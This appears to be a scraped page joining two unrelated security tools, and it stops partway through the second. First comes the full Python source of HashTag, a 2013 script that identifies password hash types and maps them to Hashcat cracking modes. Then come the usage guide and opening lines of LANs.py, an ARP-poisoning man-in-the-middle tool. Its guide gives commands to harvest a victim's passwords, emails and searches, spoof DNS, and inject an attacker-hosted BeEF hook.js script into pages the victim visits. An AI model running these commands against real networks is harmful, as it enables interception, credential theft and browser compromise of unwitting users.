Name: HashTag: Parse and Identify Password Hashes Version: 0.41 Date: 11/05/2013 Author: Smeege Contact: SmeegeSec@gmail.com Description: HashTag.py is a python script written to parse and identify password hashes. It has three main arguments which consist of identifying a single hash type (-sh), parsing and identifying multiple hashes from a file (-f), and traversing subdirectories to locate files which contain hashes and parse/identify them (-d). Many common hash types are supported by the CPU and GPU cracking tool Hashcat. Using an additional argument (-hc) hashcat modes will be included in the output file(s). #!/usr/bin/python """ Name: HashTag: Parse and Identify Password Hashes Version: 0.41 Date: 11/05/2013 Author: Smeege Contact: SmeegeSec@gmail.com Description: HashTag.py is a python script written to parse and identify password hashes. It has three main arguments which consist of identifying a single hash type (-sh), parsing and identifying multiple hashes from a file (-f), and traversing subdirectories to locate files which contain hashes and parse/identify them (-d). Many common hash types are supported by the CPU and GPU cracking tool Hashcat. Using an additional argument (-hc) hashcat modes will be included in the output file(s). Copyright © 2013, Smeege Sec (http://www.smeegesec.com) All rights reserved. Please see the attached LICENSE file for additional licensing information. """ import argparse import mimetypes import os import shutil import string parser = argparse.ArgumentParser(prog='HashTag.py', usage='%(prog)s {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]') argGroup = parser.add_mutually_exclusive_group(required=True) argGroup.add_argument("-sh", "--singleHash", type=str, help="Identify a single hash") argGroup.add_argument("-f", "--file", type=str, help="Parse a single file for hashes and identify them") argGroup.add_argument("-d", "--directory", type=str, help="Parse, identify, and categorize hashes within a directory and all subdirectories") parser.add_argument("-o", "--output", type=str, help="Filename to output full list of all identified hashes. Default is ./HashTag/HashTag_Output_File.txt") parser.add_argument("-hc", "--hashcatOutput", action='store_true', default=False, help="Output a separate file for each hash type based on hashcat modes") parser.add_argument("-n", "--notFound", action='store_true', default=False, help="--file:Include unidentifiable hashes in the output file.") args = parser.parse_args() hashDict = dict() hashcatDict = { \ 'MD5': '0', 'md5($pass.$salt)': '10', 'Joomla': '11', 'md5($salt.$pass)': '20', 'osCommerce, xt:Commerce': '21', 'm\ d5(unicode($pass).$salt)': '30', 'md5($salt.unicode($pass))': '40', 'HMAC-MD5 (key = $pass)': '50', 'HMAC-MD5 (key\ = $salt)': '60', 'SHA1': '100', 'nsldap, SHA-1(Base64), Netscape LDAP SHA': '101', 'sha1($pass.$salt)': '110', 'nsl\ daps, SSHA-1(Base64), Netscape LDAP SSHA': '111', 'Oracle 11g': '112', 'Oracle 11g, SHA-1(Oracle)': '112', 'sha1($s\ alt.$pass)': '120', 'sha1(strtolower($username).$pass), SMF >= v1.1': '121', 'OSX v10.4, v10.5, v10.6': '122', 's\ ha1(unicode($pass).$salt)': '130', 'MSSQL(2000)': '131', 'MSSQL(2005)': '132', 'sha1($salt.unicode($pass))': '140',\ 'EPiServer 6.x < v4': '141', 'HMAC-SHA1 (key = $pass)': '150', 'HMAC-SHA1 (key = $salt)': '160', 'sha1(LinkedIn)':\ '190', 'MySQL': '200', 'MySQL4.1/MySQL5': '300', 'phpass, MD5(Wordpress), MD5(phpBB3)': '400', 'md5crypt, MD5(Unix\ ), FreeBSD MD5, Cisco-IOS MD5': '500', 'SHA-1(Django)': '800', 'MD4': '900', 'md4($pass.$salt)': '910', 'NTLM': '10\ 00', 'Domain Cached Credentials, mscash': '1100', 'SHA256': '1400', 'sha256($pass.$salt)': '1410', 'sha256($salt.$p\ ass)': '1420', 'sha256(unicode($pass).$salt)': '1430', 'sha256($salt.unicode($pass))': '1440', 'EPiServer 6.x > v4'\ : '1441', 'HMAC-SHA256 (key = $pass)': '1450', 'HMAC-SHA256 (key = $salt)': '1460', 'descrypt, DES(Unix), Tradition\ al DES': '1500', 'md5apr1, MD5(APR), Apache MD5': '1600', 'SHA512': '1700', 'sha512($pass.$salt)': '1710', 'SSHA-51\ 2(Base64), LDAP {SSHA512}': '1711', 'sha512($salt.$pass)': '1720', 'OSX v10.7': '1722', 'sha512(unicode($pass).$sal\ t)': '1730', 'MSSQL(2012)': '1731', 'sha512($salt.unicode($pass))': '1740', 'HMAC-SHA512 (key = $pass)': '1750', 'H\ MAC-SHA512 (key = $salt)': '1760', 'sha512crypt, SHA512(Unix)': '1800', 'Domain Cached Credentials2, mscash2': '210\ 0', 'Cisco-PIX MD5': '2400', 'WPA/WPA2': '2500', 'Double MD5': '2600', 'md5(md5($pass))': '2600', 'vBulletin < v3.8\ .5': '2611', 'vBulletin > v3.8.5': '2711', 'IPB2+, MyBB1.2+': '2811', 'LM': '3000', 'Oracle 7-10g, DES(Oracle)': '3\ 100', 'bcrypt, Blowfish(OpenBSD)': '3200', 'MD5(Sun)': '3300', 'md5(md5(md5($pass)))': '3500', 'md5(md5($salt).$pas\ s)': '3610', 'md5($salt.md5($pass))': '3710', 'md5($pass.md5($salt))': '3720', 'WebEdition CMS': '3721', 'md5($salt\ .$pass.$salt)': '3810', 'md5(md5($pass).md5($salt))': '3910', 'md5($salt.md5($salt.$pass))': '4010', 'md5($salt.md5\ ($pass.$salt))': '4110', 'md5($username.0.$pass)': '4210', 'md5(strtoupper(md5($pass)))': '4300', 'md5(sha1($pass))\ ': '4400', 'sha1(sha1($pass))': '4500', 'sha1(sha1(sha1($pass)))': '4600', 'sha1(md5($pass))': '4700', 'MD5(Chap)':\ '4800', 'SHA-3(Keccak)': '5000', 'Half MD5': '5100', 'Password Safe SHA-256': '5200', 'IKE-PSK MD5': '5300', 'IKE-\ PSK SHA1': '5400', 'NetNTLMv1-VANILLA / NetNTLMv1+ESS': '5500', 'NetNTLMv2': '5600', 'Cisco-IOS SHA256': '5700', 'S\ amsung Android Password/PIN': '5800', 'RipeMD160': '6000', 'Whirlpool': '6100', 'TrueCrypt 5.0+ PBKDF2-HMAC-RipeMD1\ 60': '621Y', 'TrueCrypt 5.0+ PBKDF2-HMAC-SHA512': '622Y', 'TrueCrypt 5.0+ PBKDF2-HMAC-Whirlpool': '623Y', 'TrueCryp\ t 5.0+ PBKDF2-HMAC-RipeMD160 boot-mode': '624Y', 'TrueCrypt 5.0+': '62XY', 'AIX {smd5}': '6300', 'AIX {ssha256}': '\ 6400', 'AIX {ssha512}': '6500', '1Password': '6600', 'AIX {ssha1}': '6700', 'Lastpass': '6800', 'GOST R 34.11-94':\ '6900', 'Fortigate (FortiOS)': '7000', 'OSX v10.8': '7100', 'GRUB 2': '7200', 'IPMI2 RAKP HMAC-SHA1': '7300', 'sha2\ 56crypt, SHA256(Unix)': '7400'} #Check whether a string consists of only hexadecimal characters. def isHex(singleString): for c in singleString: if not c in string.hexdigits: return False return True #Check whether a string consists of hexadecimal characters or '.' or '/' def isAlphaDotSlash(singleString): for c in singleString: if not c in string.ascii_letters and not c in string.digits and not c in '.' and not c in '/': return False return True #Identifies a single hash string based on attributes such as character length, character type (hex, alphanum, etc.), and specific substring identifiers. #These conditional statements are ordered specifically to address efficiency when dealing with large inputs def identifyHash(singleHash): if len(singleHash) == 32 and isHex(singleHash): hashDict[singleHash] = ['MD5', 'NTLM', 'MD4', 'LM', 'RAdmin v2.x', 'Haval-128', 'MD2', 'RipeMD-128', 'Tiger-128', 'Snefru-128', 'MD5(HMAC)', 'MD4(HMAC)', 'Haval-128(HMAC)', 'RipeMD-128(HMAC)', 'Tiger-128(HMAC)', \ 'Snefru-128(HMAC)', 'MD2(HMAC)', 'MD5(ZipMonster)', 'MD5(HMAC(Wordpress))', 'Skein-256(128)', 'Skein-512(128)', 'md5($pass.$salt)', 'md5($pass.$salt.$pass)', 'md5($pass.md5($pass))', 'md5($salt.$pass)', 'md5($salt.$pass.$salt)', \ 'md5($salt.$pass.$username)', 'md5($salt.\'-\'.md5($pass))', 'md5($salt.md5($pass))', 'md5($salt.md5($pass).$salt)', 'md5($salt.MD5($pass).$username)', 'md5($salt.md5($pass.$salt))', 'md5($salt.md5($salt.$pass))', 'md5($salt.md5(md5($pass).$salt))', \ 'md5($username.0.$pass)', 'md5($username.LF.$pass)', 'md5($username.md5($pass).$salt)', 'md5(1.$pass.$salt)', 'md5(3 x strtoupper(md5($pass)))', 'md5(md5($pass)), Double MD5', 'md5(md5($pass).$pass)', 'md5(md5($pass).$salt), vBulletin < v3.8.5', 'md4($salt.$pass)', 'md4($pass.$salt)' \ 'md5(md5($pass).md5($pass))', 'md5(md5($pass).md5($salt))', 'md5(md5($salt).$pass)', 'md5(md5($salt).md5($pass))', 'md5(md5($username.$pass).$salt)', 'md5(md5(base64_encode($pass)))', 'md5(md5(md5($pass)))', 'md5(md5(md5(md5($pass))))', \ 'md5(md5(md5(md5(md5($pass)))))', 'md5(sha1($pass))', 'md5(sha1(base64_encode($pass)))', 'md5(sha1(md5($pass)))', 'md5(sha1(md5($pass)).sha1($pass))', 'md5(sha1(md5(sha1($pass))))', 'md5(strrev($pass))', 'md5(strrev(md5($pass)))', \ 'md5(strtoupper(md5($pass)))', 'md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))', 'strrev(md5($pass))', 'strrev(md5(strrev(md5($pass))))', '6 x md5($pass)', '7 x md5($pass)', '8 x md5($pass)', '9 x md5($pass)', '10 x md5($pass)', '11 x md5($pass)', '12 x md5($pass)'] elif len(singleHash) > 32 and singleHash[32] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['md5($salt.$pass.$salt)', 'md5($salt.md5($pass))', 'md5($salt.md5($pass.$salt))', 'md5($salt.md5($salt.$pass))', 'md5($username.0.$pass)', 'md5(md5($pass).md5($salt))', 'md5(md5($salt).$pass)', 'HMAC-MD5 (key = $pass)', 'HMAC-MD5 (key = $salt)', 'md5($pass.md5($salt))', \ 'WebEdition CMS', 'IPB2+, MyBB1.2+', 'md5(unicode($pass).$salt)', 'Domain Cached Credentials2, mscash2', 'md5($salt.unicode($pass))', 'vBulletin > v3.8.5', 'DCC2', 'md5(md5($pass).$salt), vBulletin < v3.8.5'] elif len(singleHash) == 40: hashDict[singleHash] = ['SHA1', 'Tiger-160', 'Haval-160', 'RipeMD160', 'HAS-160', 'SHA-1(HMAC)', 'Tiger-160(HMAC)', 'Haval-160(HMAC)', 'RipeMD-160(HMAC)', 'Skein-256(160)', 'Skein-512(160)', 'sha1(LinkedIn)', 'SAPG', 'SHA-1(MaNGOS)', 'SHA-1(MaNGOS2)', \ 'sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))', 'sha1(md5($pass).$userdate.$salt)', 'sha1($pass.$username.$salt)', 'sha1(md5($pass).$pass)', 'sha1(md5(sha1($pass)))', 'xsha1(strtolower($pass))', 'sha1($pass.$salt)', 'sha1($salt.$pass)', \ 'sha1($salt.$username.$pass.$salt)', 'sha1($salt.md5($pass))', 'sha1($salt.md5($pass).$salt)', 'sha1($salt.sha1($pass))', 'sha1($salt.sha1($salt.sha1($pass)))', 'sha1($username.$pass)', 'sha1($username.$pass.$salt)', 'sha1(md5($pass))', \ 'sha1(md5($pass).$salt)', 'sha1(md5(sha1(md5($pass))))', 'sha1(sha1($pass))', 'sha1(sha1($pass).$salt)', 'sha1(sha1($pass).substr($pass,0,3))', 'sha1(sha1($salt.$pass))', 'sha1(sha1(sha1($pass)))', 'sha1(strtolower($username).$pass)'] elif len(singleHash) > 40 and singleHash[40] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['sha1($pass.$salt)', 'HMAC-SHA1 (key = $pass)', 'HMAC-SHA1 (key = $salt)', 'sha1(unicode($pass).$salt)', 'sha1($salt.$pass)', 'sha1($salt.unicode($pass))', 'Samsung Android Password/PIN', 'sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))', 'sha1(md5($pass).$userdate.$salt)', 'sha1($pass.$username.$salt)'] elif len(singleHash) == 64 and isHex(singleHash): hashDict[singleHash] = ['Keccak-256', 'sha256(md5($pass).$pass))', 'Skein-256', 'Skein-512(256)', 'Ventrilo', 'WPA-PSK PMK', 'GOST R 34.11-94', 'Haval-256', 'RipeMD-256', 'SHA256', 'sha256(md5($pass))', 'sha256(sha1($pass))', 'Snefru-256', 'HMAC-SHA256 (key = $salt)', 'SHA-3(Keccak)'] elif len(singleHash) > 64 and singleHash[64] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['sha256(md5($pass.$salt))', 'sha256(md5($salt.$pass))', 'SHA-256(RuneScape)', 'sha256(sha256($pass).$salt)', 'Haval-256(HMAC)', 'RipeMD-256(HMAC)', 'sha256($pass.$salt)', 'sha256($salt.$pass)', 'SHA-256(HMAC)', 'Snefru-256(HMAC)', 'HMAC-SHA256 (key = $pass)', 'sha256(unicode($pass).$salt)', 'sha256($salt.unicode($pass))'] elif singleHash.startswith('sha1$'): hashDict[singleHash] = ['SHA-1(Django)'] elif singleHash.startswith('$H$'): hashDict[singleHash] = ['phpass, MD5(Wordpress), MD5(phpBB3)'] elif singleHash.startswith('$P$'): hashDict[singleHash] = ['phpass, MD5(Wordpress), MD5(phpBB3)'] elif singleHash.startswith('$1$'): hashDict[singleHash] = ['md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5'] elif singleHash.startswith('$apr1$'): hashDict[singleHash] = ['md5apr1, MD5(APR), Apache MD5'] elif singleHash.startswith('sha256$'): hashDict[singleHash] = ['SHA-256(Django)'] elif singleHash.startswith('$SHA$'): hashDict[singleHash] = ['SHA-256(AuthMe)'] elif singleHash.startswith('sha256$'): hashDict[singleHash] = ['SHA-256(Django)'] elif singleHash.startswith('sha384$'): hashDict[singleHash] = ['SHA-384(Django)'] elif singleHash.startswith('$SHA$'): hashDict[singleHash] = ['SHA-256(AuthMe)'] elif singleHash.startswith('$2$') or singleHash.startswith('$2a$') or singleHash.startswith('$2y'): hashDict[singleHash] = ['bcrypt, Blowfish(OpenBSD)'] elif singleHash.startswith('$5$'): hashDict[singleHash] = ['sha256crypt, SHA256(Unix)'] elif singleHash.startswith('$6$'): hashDict[singleHash] = ['sha512crypt, SHA512(Unix)'] elif singleHash.startswith('$S$'): hashDict[singleHash] = ['SHA-512(Drupal)'] elif singleHash.startswith('{SHA}'): hashDict[singleHash] = ['nsldap, SHA-1(Base64), Netscape LDAP SHA'] elif singleHash.startswith('{SSHA}'): hashDict[singleHash] = ['nsldaps, SSHA-1(Base64), Netscape LDAP SSHA'] elif singleHash.startswith('{smd5}'): hashDict[singleHash] = ['AIX {smd5}'] elif singleHash.startswith('{ssha1}'): hashDict[singleHash] = ['AIX {ssha1}'] elif singleHash.startswith('$md5$'): hashDict[singleHash] = ['MD5(Sun)'] elif singleHash.startswith('$episerver$*0*'): hashDict[singleHash] = ['EPiServer 6.x < v4'] elif singleHash.startswith('$episerver$*1*'): hashDict[singleHash] = ['EPiServer 6.x > v4'] elif singleHash.startswith('{ssha256}'): hashDict[singleHash] = ['AIX {ssha256}'] elif singleHash.startswith('{SSHA512}'): hashDict[singleHash] = ['SSHA-512(Base64), LDAP {SSHA512}'] elif singleHash.startswith('{ssha512}'): hashDict[singleHash] = ['AIX {ssha512}'] elif singleHash.startswith('$ml$'): hashDict[singleHash] = ['OSX v10.8'] elif singleHash.startswith('grub'): hashDict[singleHash] = ['GRUB 2'] elif singleHash.startswith('sha256$'): hashDict[singleHash] = ['SHA-256(Django)'] elif singleHash.startswith('sha384$'): hashDict[singleHash] = ['SHA-384(Django)'] elif singleHash.startswith('0x'): if len(singleHash) == 34: hashDict[singleHash] = ['Lineage II C4'] elif len(singleHash) < 60: hashDict[singleHash] = ['MSSQL(2005)'] elif len(singleHash) < 100: hashDict[singleHash] = ['MSSQL(2000)'] else: hashDict[singleHash] = ['MSSQL(2012)'] elif singleHash.startswith('S:'): hashDict[singleHash] = ['Oracle 11g'] elif len(singleHash) > 41 and singleHash.count(':') == 1 and singleHash[-41] == ':' and isHex(singleHash[-40:]): hashDict[singleHash] = ['sha1(strtolower($username).$pass), SMF >= v1.1'] elif singleHash.count(':') > 1: if singleHash.count(':') == 5: hashDict[singleHash] = ['NetNTLMv2', 'NetNTLMv1-VANILLA / NetNTLMv1+ESS'] elif singleHash.count(':') == 2 and '@' not in singleHash: hashDict[singleHash] = ['MD5(Chap)'] elif singleHash.count(':') == 3 or singleHash.count(':') == 6: hashDict[singleHash] = ['Domain Cached Credentials, mscash'] try: hashDict[singleHash.split(':')[3]] = 'NTLM' if not singleHash.split(':')[2] == 'aad3b435b51404eeaad3b435b51404ee' and not singleHash.split(':')[2] == 'aad3b435b51404eeaad3b435b51404ee'.upper(): hashDict[singleHash.split(':')[2]] = 'LM' except Exception as e: pass elif singleHash.count(':') == 2 and '@' in singleHash: hashDict[singleHash] = ['Lastpass'] elif len(singleHash) == 4: hashDict[singleHash] = ['CRC-16', 'CRC-16-CCITT', 'FCS-16'] elif len(singleHash) == 8: hashDict[singleHash] = ['CRC-32', 'CRC-32B', 'FCS-32', 'ELF-32', 'Fletcher-32', 'FNV-32', 'Adler-32', 'GHash-32-3', 'GHash-32-5'] elif len(singleHash) == 13: if singleHash.startswith('+'): hashDict[singleHash] = ['Blowfish(Eggdrop)'] else: hashDict[singleHash] = ['descrypt, DES(Unix), Traditional DES'] elif len(singleHash) == 16: if isHex(singleHash): hashDict[singleHash] = ['MySQL, MySQL323', 'Oracle 7-10g, DES(Oracle)', 'CRC-64', 'SAPB', 'substr(md5($pass),0,16)', 'substr(md5($pass),16,16)', 'substr(md5($pass),8,16)'] else: hashDict[singleHash] = ['Cisco-PIX MD5'] elif len(singleHash) > 16 and singleHash[-17] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['DES(Oracle)', 'Oracle 10g'] elif len(singleHash) == 20: hashDict[singleHash] = ['substr(md5($pass),12,20)'] elif len(singleHash) == 24 and isHex(singleHash): hashDict[singleHash] = ['CRC-96(ZIP)'] elif len(singleHash) == 35: hashDict[singleHash] = ['osCommerce, xt:Commerce'] elif len(singleHash) > 40 and singleHash[40] == ':' and singleHash.count(':') == 1: hashDict[singleHash] = ['sha1($salt.$pass.$salt)', 'sha1(md5($pass.$salt))'] elif len(singleHash) > 40 and singleHash.count('-') == 2 and singleHash.count(':') == 2: hashDict[singleHash] = ['sha1(md5($pass).$userdate.$salt)'] elif len(singleHash) > 40 and singleHash.count(':') == 2 and len(singleHash.split(':')[1]) == 40 : hashDict[singleHash] = ['sha1($pass.$username.$salt)'] elif len(singleHash) == 41 and singleHash.startswith('*') and isHex(singleHash[1:40]): hashDict[singleHash] = ['MySQL4.1/MySQL5'] elif len(singleHash) == 43: hashDict[singleHash] = ['Cisco-IOS SHA256'] elif len(singleHash) == 47: hashDict[singleHash] = ['Fortigate (FortiOS)'] elif len(singleHash) == 48 and isHex(singleHash): hashDict[singleHash] = ['Oracle 11g, SHA-1(Oracle)', 'Haval-192', 'Haval-192(HMAC)' 'Tiger-192', 'Tiger-192(HMAC)', 'OSX v10.4, v10.5, v10.6'] elif len(singleHash) == 51 and isHex(singleHash): hashDict[singleHash] = ['MD5(Palshop)', 'Palshop'] elif len(singleHash) == 56 and isHex(singleHash): hashDict[singleHash] = ['SHA-224', 'Haval-224', 'SHA-224(HMAC)', 'Haval-224(HMAC)', 'Keccak-224', 'Skein-256(224)', 'Skein-512(224)'] elif len(singleHash) == 65: hashDict[singleHash] = ['Joomla'] elif len(singleHash) > 64 and singleHash[64] == ':': hashDict[singleHash] = ['SHA-256(PasswordSafe)', 'sha256(md5($salt.$pass))', 'sha256(md5($pass.$salt))', 'SHA-256(HMAC)', 'SHA-256(RuneScape)', 'sha256($salt.$pass)', 'sha256($pass.$salt)', 'Haval-256(HMAC)', 'RipeMD-256(HMAC)', 'Snefru-256(HMAC)', 'sha256(sha256($pass).$salt)'] elif len(singleHash) == 80 and isHex(singleHash): hashDict[singleHash] = ['RipeMD-320', 'RipeMD-320(HMAC)'] elif len(singleHash) == 96 and isHex(singleHash): hashDict[singleHash] = ['SHA-384', 'Keccak-384', 'SHA-384(HMAC)', 'sha384($salt.$pass)', 'sha384($pass.$salt)', 'Skein-512(384)', 'Skein-1024(384)'] elif len(singleHash) == 128 and isHex(singleHash): hashDict[singleHash] = ['Keccak-512', 'Skein-1024(512)', 'Skein-512', 'SHA512', 'sha512($pass.$salt)', 'sha512($salt.$pass)', 'SHA-512(HMAC)', 'Whirlpool', 'Whirlpool(HMAC)', 'sha512(unicode($pass).$salt)', 'sha512($salt.unicode($pass))', 'HMAC-SHA512 (key = $pass)'] elif len(singleHash) > 128 and singleHash[128] == ':': hashDict[singleHash] = ['HMAC-SHA512 (key = $salt)'] elif len(singleHash) == 130 and isHex(singleHash): hashDict[singleHash] = ['IPMI2 RAKP HMAC-SHA1'] elif len(singleHash) == 136 and isHex(singleHash): hashDict[singleHash] = ['OSX v10.7'] elif len(singleHash) == 177: hashDict[singleHash] = ['Whirlpool(Double)'] elif len(singleHash) == 256 and isHex(singleHash): hashDict[singleHash] = ['Skein-1024'] else: hashDict[singleHash] = [] if args.singleHash: """ Single Hash Identification: HashTag.py -sh hash Prints to screen all possible hash types and their corresponding hashcat mode if one exists. Note: When identifying a single hash on *nix operating systems remember to use single quotes to prevent interpolation. (e.g. python HashTag.py -sh '$1$abc$12345') """ identifyHash(args.singleHash) if len(hashDict[args.singleHash]): print '\nHash: {0}\n'.format(args.singleHash) for value in hashDict[args.singleHash]: hcFound = False for k, v in hashcatDict.iteritems(): if value == k: print '[*] {0} - Hashcat Mode {1}'.format(value, v) hcFound = True break if hcFound == False: print '[*] {0}'.format(value) else: print '\nHash not found: {0}'.format(args.singleHash) elif args.file: """ File Parsing and Hash Identification: HashTag.py -f file.txt [-o output_filename] [-hc] [-n] Parses a single file for possible password hashes and attempts to identify each one. Outputs to one or multiple files depending on -hc argument. """ inputFile = args.file hashCount = 0 foundModes = list() while not os.path.isfile(inputFile): inputFile = raw_input("\nFile \'{0}\' not Found!\n\nHash File Path: ".format(str(inputFile))) openInputFile = open(inputFile, 'r') if not os.path.exists('HashTag'): os.mkdir('HashTag') if args.output: while os.path.isfile(args.output) or os.path.isfile(args.output + '.txt'): args.output = raw_input("\nOutput file already exists!\n\nOutput Filename: ") outputFile = open(args.output, 'w') else: outputFile = open(os.path.join('HashTag', 'HashTag_Output_File.txt'), 'w') for line in openInputFile.readlines(): identifyHash(line.strip()) if hashDict: for k, v in hashDict.iteritems(): for mode, num in hashcatDict.iteritems(): if mode in v: hashcatMode = num foundModes.append(num) else: hashcatMode = '' if v: hashCount += 1 foundModes.sort(key=int) outputFile.write('Hash: {0}\nChar Length: {1}\nHashcat Modes: {2}\nHash Types: {3}\n\n'.format(k, len(k), foundModes, v)) if args.hashcatOutput and foundModes: for mode in foundModes: with open(os.path.join('HashTag', mode), "a") as outputTypeFile: outputTypeFile.write(k + '\n') outputTypeFile.close() foundModes = [] elif k and args.notFound: outputFile.write('Hash: {0}\nChar Length: {1}\nHashcat Modes: {2}\nHash Types: {3}\n\n'.format(k, len(k), hashcatMode, 'NONE FOUND')) print '\nFile Mimetype: {0}\nHashes Found: {1}\nFile successfully written: {2}'.format(mimetypes.guess_type(inputFile)[0], hashCount, outputFile.name) openInputFile.close() outputFile.close() else: print '\nNo hashes parsed from file {0}'.format(inputFile) elif args.directory: """ File Parsing and Hash Identification while traversing directories and subdirectories: HashTag.py -d test_dir/hash_files/ [-o output_filename] [-hc] Traverses user specified directory and all subdirectories. Identifies each file based on type or extension and attempts to parse each file for possible password hashes. Potential password protected files are separated by filetype and copied using the shutil module to new folders. Outputs to one or multiple files depending on -hc argument. """ inputDir = args.directory while not os.path.isdir(inputDir): inputDir = raw_input("\nDirectory \'{0}\' not Found!\n\nHash Files Directory: ".format(str(inputDir))) if not os.path.exists('HashTag'): os.mkdir('HashTag') if args.output: while os.path.isfile(args.output) or os.path.isfile(args.output + '.txt'): args.output = raw_input("\nOutput file already exists!\n\nOutput Filename: ") outputFile = open(args.output, 'w') else: outputFile = open(os.path.join('HashTag', 'HashTag_Hash_File.txt'), 'w') validFiles = list() validHashes = list() invalidFiles = list() nonTextFiles = ['.1password', '.7z', '.bdb', '.dd', '.hccap', '.ikemd5', '.ikesha1', '.kdbx', '.odt', '.pdf', '.plist', '.psafe', '.sig', '.sign', '.tc', '.torrent', '.zip', '.xz'] nonTextFileCount = 0 for root, dirnames, filenames in os.walk(inputDir): for filename in filenames: if mimetypes.guess_type(filename)[0] == 'text/plain' or '.hash' in filename: foundHashFile = (os.path.join(root, filename)) validFiles.append(foundHashFile) elif any(nonTextFile in filename for nonTextFile in nonTextFiles): for nonTextFile in nonTextFiles: if nonTextFile in filename: newDir = os.path.join('HashTag', nonTextFile.replace('.', '')) if not os.path.exists(newDir): os.makedirs(newDir) shutil.copy2(os.path.join(root, filename), os.path.join(newDir, filename)) else: invalidFiles.append((os.path.join(root, filename))) if validFiles: for hashFile in validFiles: openHashFile = open(hashFile) hashLines = [line.strip() for line in openHashFile] for singleHash in hashLines: if len(line) > 3 and len(line) <= 300: validHashes.append(singleHash) openHashFile.close() else: print 'No valid file formats found.' if validHashes: for singleHash in validHashes: identifyHash(singleHash) #Write all parsed hashes to output file. Comment out for less overhead. outputFile.write(singleHash + '\n') outputFile.close() validHashCount = len(validHashes) validFileCount = len(validFiles) + nonTextFileCount invalidFileCount = len(invalidFiles) print '\nTotal Hashes Found: {0}'.format(validHashCount) print 'Valid file types: {0}'.format(validFileCount) print 'Invalid file types: {0}'.format(invalidFileCount) openInvalidFiles = open(os.path.join('HashTag','HashTag_Invalid_Files' + '.txt'), 'w') for invalidFile in invalidFiles: openInvalidFiles.write(invalidFile + '\n') print '\nNow identifying {0} hashes from {1} files...'.format(validHashCount, validFileCount) notifyCount = 0 tenPercentCount = (validHashCount / 10) if args.hashcatOutput: for key, valueList in hashDict.iteritems(): if valueList: for value in valueList: if value in hashcatDict.iterkeys(): with open(os.path.join('HashTag',value) + '_{0}.txt'.format(hashcatDict[value]), "a") as f: f.write(key + '\n') else: with open(os.path.join('HashTag',value) + '.txt', "a") as f: f.write(key + '\n') else: with open(os.path.join('HashTag','HashTag_Invalid_Hashes') + '.txt', "a") as g: g.write(key + '\n') notifyCount += 1 if (notifyCount % tenPercentCount) == 0: print '{0}/{1} hashes have been identified and written.'.format(notifyCount,validHashCount) else: for key, valueList in hashDict.iteritems(): if valueList: for value in valueList: with open(os.path.join('HashTag',value) + '.txt', "a") as f: f.write(key + '\n') else: with open(os.path.join('HashTag','HashTag_Invalid_Hashes') + '.txt', "a") as g: g.write(key + '\n') notifyCount += 1 if (notifyCount % tenPercentCount) == 0: print '{0}/{1} hashes have been identified and written.'.format(notifyCount,validHashCount) print '\n{0} hashes have been identified and written to separate files based on hash type.\nA full list has been written to file {1}'.format(notifyCount, outputFile.name) Sources - Documentation: https://github.com/SmeegeSec/HashTag Smeege Sec: HashTag: Password Hash Identification

Multithreaded asynchronous packet parsing/injecting ARP poisoner. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself. Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you choose not to use the -ip option Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim. All options: python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] Usage Simplest usage (including active user targeting): python LANs.py Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending. so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing. Passive harvesting: python LANs.py -u -d -p -ip 192.168.0.10 -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting -d: open an xterm with driftnet to see all images they view -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received; will also decode base64 if the email authentication is encrypted with it -ip: target this IP address Easy to remember and will probably be the most common usage of the script: options u, d, p, like udp/tcp. HTML injection: python LANs.py -b http://192.168.0.5:3000/hook.js Inject a BeEF hook URL (BeEF - The Browser Exploitation Framework Project, tutorial: The Browser Exploitation Framework (BeEF) – Part 1 - InfoSec Institute) into pages the victim visits. python LANs.py -c '<title>Owned.</title>' Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> and failing that injects prior to the first </head>. This example will change the page title to 'Owned.' Read from pcap: python LANs.py -pcap libpcapfilename -ip 192.168.0.10 To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script. Most aggressive usage: python LANs.py -v -d -p -n -na -set -dns facebook.com -r 74.125.225.64 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10 #!/usr/bin/env python2 ''' Description: ARP poisons a LAN victim and prints all the interesting unencrypted info like usernames, passwords and messages. Asynchronous multithreaded arp spoofing packet parser. Prerequisites: Linux nmap (optional) nbtscan (optional) aircrack-ng Python 2.6+ nfqueue-bindings 0.4-3 scapy twisted Note: This script flushes iptables before and after usage. To do: Add karma MITM technique Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through Add anticaching (just edit the headers) Ability to add option which will add a delay, allowing user to modify HTML/email/irc/usernames and passwords on the fly (how much interest is there in this?) ''' __author__ = 'Dan McInerney' __license__ = 'BSD' __contact__ = 'danhmcinerney with gmail' __version__ = 1.0 try: import nfqueue except Exception: nfq = raw_input('[-] python-nfqueue not installed, would you like to install now? (apt-get install -y python-nfqueue will be run if yes) 